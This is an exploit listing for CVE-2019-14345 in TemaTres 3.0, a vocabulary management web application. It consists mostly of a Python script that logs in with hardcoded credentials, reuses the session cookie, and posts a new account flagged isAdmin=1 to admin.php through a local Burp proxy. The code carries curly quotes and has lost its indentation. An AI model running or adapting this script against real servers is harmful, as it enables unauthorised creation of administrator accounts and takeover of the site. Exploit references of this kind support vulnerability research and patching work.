Share
# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)  
# Author: Pablo Santiago  
# Date: 2019-11-14  
# Vendor Homepage: https://www.vocabularyserver.com/  
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download  
# Version: 3.0  
# CVE : 2019–14345  
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f  
# Tested on: Windows 10  
  
# Description:  
# Web application for management formal representations of knowledge,  
# thesauri, taxonomies and multilingual vocabularies / Aplicación para  
# la gestión de representaciones formales del conocimiento, tesauros,  
# taxonomías, vocabularios multilingües.  
  
#Exploit  
  
import requests  
import sys  
  
session = requests.Session()  
  
http_proxy = “http://127.0.0.1:8080"  
https_proxy = “https://127.0.0.1:8080"  
  
proxyDict = {  
“http” : http_proxy,  
“https” : https_proxy  
}  
  
url = ‘http://localhost/tematres/vocab/login.php'  
values = {‘id_correo_electronico’: ‘pablo@tematres.com’,  
‘id_password’: ‘admin’,  
‘task’:’login’}  
  
r = session.post(url, data=values, proxies=proxyDict)  
cookie = session.cookies.get_dict()[‘PHPSESSID’]  
  
print (cookie)  
  
host = sys.argv[1]  
user = input(‘[+]User:’)  
lastname = input(‘[+]lastname:’)  
password = input(‘[+]Password:’)  
password2 = input(‘[+]Confirm Password:’)  
email = input(‘[+]Email:’)  
  
if (password == password2):  
#configure proxy burp  
  
data = {  
‘_nombre’:user,  
‘_apellido’:lastname,  
‘_correo_electronico’:email,  
‘orga’:’bypassed’,  
‘_clave’:password,  
‘_confirmar_clave’:password2,  
‘isAdmin’:1,  
‘boton’:’Guardar’,  
‘userTask’:’A’,  
‘useactua’:’’  
  
}  
headers= {  
‘Cookie’: ‘PHPSESSID=’+cookie  
}  
request = session.post(host+’/tematres/vocab/admin.php’, data=data,  
headers=headers, proxies=proxyDict)  
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)  
print(‘Status Code:’+ str(request.status_code))  
  
else:  
print (‘Passwords dont match!!!’)